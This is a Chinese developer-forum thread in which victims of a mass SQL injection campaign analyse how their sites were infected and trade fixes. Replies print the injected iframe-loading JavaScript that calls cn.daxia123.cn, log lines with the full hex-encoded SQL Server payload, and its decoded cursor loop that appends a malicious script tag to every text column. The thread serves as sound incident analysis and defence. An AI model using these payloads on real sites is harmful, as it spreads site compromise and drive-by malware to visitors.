中招的朋友们,进来一起[举报恶意网站] cn.daxia123.cn|cn.jxmmtv.com
最近网站经常被这样挂马
修改用户数据库挂马,google搜索有2000多网站中招
我的也中招了,我分析了一下。
以下是cn.js的代码
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("cnfuck=");
if (start != -1)
{
}
else
{
var expires = new Date();
expires.setTime(expires.getTime()+1*3600*1000);
document.cookie = "cnfuck=update;expires="+expires.toGMTString();
document.write("<iframe src=http://cn.daxia123.cn/cn.htm width=200 height=0></iframe>");
document.write("<iframe src=http://cn.daxia123.cn/s.htm width=200 height=0></iframe>");
}
而上述引用到的cn.htm的代码是:
<script src="http://s39.cnzz.com/stat.php?id=1184740&web_id=1184740"
language="JavaScript" charset="gb2312"></script>
可以看出是为了向中国站长网刷IP的。如果有中国站长网的人,请明确一下上述代码的作用,
根据id=1184740&web_id=1184740找出真凶。
而上述引用到的s.htm的代码是一些乱码,我发在附件,高手帮分析一下。
请解决问题的朋友来帮帮忙吧~
猜测会不会是通过sql注入式攻击,但我们的代码已经进行防水处理了,不知道是从哪儿攻击网站的
[解决办法]
hen taoyan de ma
[解决办法]
你看看你的数据库里面有没有<script>类型这样的东西,如果有那就是被注入了
[解决办法]
郁闷啊, 我网站也被中标了。怎么办。
[解决办法]
我的也中招了,昨天把数据库还原了,今天早上发现有中马了,还是<script src=http://cn.daxia123.cn/cn.js></script>,刚把昨天的数据库 中的<script src=http://cn.daxia123.cn/cn.js></script>这段代码都给清除掉了,幸好数据量不是很大,又还原数据库了,现在中马的原因还没查处了啊,郁闷哪。。。
[解决办法]
日。自己写的代码最基本的要防SQL注入啊
[解决办法]
这几天也不知咋搞的.我的站上面也有啊.清理也不管.钢清理完又有了.
[解决办法]
建议大家人肉搜索一下那家伙.
[解决办法]
地址是访问量统计,人家用来统计中招的的网站浏览量。
是服务器中毒而已,根本不是sql注入。
[解决办法]
哦.看来还挻复杂的吗.
[解决办法]
我也中了这个大侠123的木马,我使用了一个暂时解决的办法,对vachar或nvachar字段长度做了限制,找出该字段最长的字段长度N,然后将该字段的最大长度设为N,发现效果还可以,至少已经有2天没有被注入了,其他如ntext或text字段的就做了一个触发器的限制,不允许插入script。
如果按13楼所说是2进制注入的话,我觉得可以通过判断post值的长度来临时解决,毕竟正常情况下不会传一个这么长的值吧
[解决办法]
顶,关注了
[解决办法]
最近网站经常被这样挂马
修改用户数据库挂马,google搜索有2000多
网站中招
我的也中招了,我分析了一下。
以下是cn.js的代码
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf
("cnfuck=");
if (start != -1)
{
}
else
{
var expires = new Date();
expires.setTime(expires.getTime()
+1*3600*1000);
document.cookie =
"cnfuck=update;expires="+expires.toGMT
String();
document.write(" <iframe
src=http://cn.daxia123.cn/cn.htm
width=200 height=0> </iframe>");
document.write(" <iframe
src=http://cn.daxia123.cn/s.htm
width=200 height=0> </iframe>");
}
而上述引用到的cn.htm的代码是:
<script
src="http://s39.cnzz.com/stat.php?
id=1184740&web_id=1184740"
language="JavaScript"
charset="gb2312"> </script>
可以看出是为了向中国站长网刷IP的。如果
有中国站长网的人,请明确一下上述代码的
作用,
根据id=1184740&web_id=1184740找出真凶
。
而上述引用到的s.htm的代码是一些乱码,
我发在附件,高手帮分析一下。
请解决问题的朋友来帮帮忙吧~
猜测会不会是通过sql注入式攻击,但我们的
代码已经进行防水处理了,不知道是从哪儿
攻击网站的
网上有的朋友找到了下面内容:
目前发现一个问题了,是注入式攻击,通过
对访问日志的查看,终于发现了访问有问题
,来自IP-121.42.214.238(河北省邯郸市
)的访问里面,有一段:
GET /news/more.asp
classid=18;dEcLaRe%20@S%20VaRcHaR
(4000)%20SeT%20@s=cAsT
(0x4445434C415245204054205641524348415
228323535292C4043205641524348415228323
53529204445434C415245205461626C655F437
572736F7220435552534F5220464F522053454
C45435420612E6E616D652C622E6E616D65204
6524F4D207379736F626A6563747320612C737
973636F6C756D6E73206220574845524520612
E69643D622E696420414E4420612E787479706
53D27752720414E442028622E78747970653D3
939204F5220622E78747970653D3335204F522
0622E78747970653D323331204F5220622E787
47970653D31363729204F50454E205461626C6
55F437572736F72204645544348204E4558542
046524F4D205461626C655F437572736F72204
94E544F2040542C4043205748494C452840404
6455443485F5354415455533D3029204245474
94E20455845432827555044415445205B272B4
0542B275D20534554205B272B40432B275D3D5
25452494D28434F4E564552542856415243484
1522834303030292C5B272B40432B275D29292
B27273C736372697074207372633D687474703
A2F2F636E2E6A786D6D74762E636F6D2F636E2
E6A733E3C2F7363726970743E2727272920464
5544348204E4558542046524F4D205461626C6
55F437572736F7220494E544F2040542C40432
0454E4420434C4F5345205461626C655F43757
2736F72204445414C4C4F43415445205461626
C655F437572736F72%20aS%20VaRcHaR
(4000));eXeC(@s);-- 80 -
121.42.214.238 Mozilla/4.0+
(compatible;+MSIE+6.0;+Windows+NT+5.0)
404 0 3
里面明显地有注入的攻击代码。我猜想会不
会是这个引起的病毒,而这一访问也和我的
网站中病毒时间吻合,所以强烈建议大家检
查你的网站,是不是对程序进行过防水处理
了!
快过元旦了,大家都做好安检工作吧~
希望大家帮忙顶,让更多人知道这个木马,
让更多人受益
我也做了防止SQL注入的代码,可还是被修改
数据库存中内容
下面的是日志
/gqxx/gx_info.asp id=48941';dEcLaRe%
20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT
(0x4445434C415245204054205641524348415
228323535292C4043205641524348415228323
53529204445434C415245205461626C655F437
572736F7220435552534F5220464F522053454
C45435420612E6E616D652C622E6E616D65204
6524F4D207379736F626A6563747320612C737
973636F6C756D6E73206220574845524520612
E69643D622E696420414E4420612E787479706
53D27752720414E442028622E78747970653D3
939204F5220622E78747970653D3335204F522
0622E78747970653D323331204F5220622E787
47970653D31363729204F50454E205461626C6
55F437572736F72204645544348204E4558542
046524F4D205461626C655F437572736F72204
94E544F2040542C4043205748494C452840404
6455443485F5354415455533D3029204245474
94E20455845432827555044415445205B272B4
0542B275D20534554205B272B40432B275D3D5
25452494D28434F4E564552542856415243484
1522834303030292C5B272B40432B275D29292
B27273C736372697074207372633D687474703
A2F2F636E2E6A786D6D74762E636F6D2F636E2
E6A733E3C2F7363726970743E2727272920464
5544348204E4558542046524F4D205461626C6
55F437572736F7220494E544F2040542C40432
0454E4420434C4F5345205461626C655F43757
2736F72204445414C4C4F43415445205461626
C655F437572736F72%20aS%20VaRcHaR
(4000));eXeC(@s);-- 80 - 122.9.2.39
Mozilla/4.0+
(compatible;+MSIE+6.0;+Windows+NT+5.0)
200 0 0
我用的就是.net
原因基本查到了,就是攻击者将攻击代码用
2进制,或10或10进制编译成了
类似于这样的代码:
0x4445434C4152452040542056415243484152
28323535292C404
放sql注入的代码不能检测出来,但是sql
server 会把这样的代码在解释成原来的样
子
这样就绕过了sql防注入代码。
但是,这个代码仅对能解释它的sql server
这样的数据库有效
针对access这样的不能解释它的数据库类型
攻击无效
我也中了这个大侠123的木马,我使用了一
个暂时解决的办法,对vachar或nvachar字段
长度做了限制,找出该字段最长的字段长度
N,然后将该字段的最大长度设为N,发现效
果还可以,至少已经有2天没有被注入了,
其他如ntext或text字段的就做了一个触发
器的限制,不允许插入script。
如果按13楼所说是2进制注入的话,我觉得
可以通过判断post值的长度来临时解决,毕
竟正常情况下不会传一个这么长的值吧
[解决办法]
各位朋友:
我也和你们一样中标了
我在卡卡论坛里看到一些信息,希望对各位有所帮助!
参考网址 :http://bbs.ikaka.com/showtopic-8580913-3.aspx
这些二进制编码是:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
此种方法的破坏程度非常严重丫!!!
没有防止注入,总有一次会成功的
我数据库复原后,自己还傻傻的试了一次…又得重新复原一次
除了防止注入是否还有更好的办法呢?
[解决办法]
以上内容是引用别人的,我也刚刚看到的,希望对大家有时帮助
[解决办法]
NND,我也中招了
[解决办法]
Up
[解决办法]
我也中招了,是在数据库里的末尾加入了<script....>
autumnkhy 这位朋友,你说在text型加个触发器,限制<script...>输入,请问怎么做呀
[解决办法]
up
[解决办法]